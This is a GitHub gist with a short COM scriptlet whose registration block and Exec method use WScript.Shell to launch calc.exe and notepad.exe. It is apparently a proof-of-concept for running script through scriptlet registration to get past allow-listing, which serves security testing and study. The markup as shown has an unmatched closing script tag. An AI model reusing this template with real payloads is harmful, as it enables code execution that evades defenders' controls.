Skip to content

Instantly share code, notes, and snippets.

@clr2of8
Created September 15, 2022 21:22
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save clr2of8/6e07cd3955c898cc70e72e0871e1d2d9 to your computer and use it in GitHub Desktop.
Save clr2of8/6e07cd3955c898cc70e72e0871e1d2d9 to your computer and use it in GitHub Desktop.
<?XML version="1.0"?>
<scriptlet>
<registration
description="a desc"
progid="aprogid"
version="1.00"
classid="{123A1231-1111-2323-2323-2323FEEDACDC}"
>
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec()
{
var r = new ActiveXObject("WScript.Shell").Run("notepad.exe");
}
]]>
</script>
</scriptlet>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment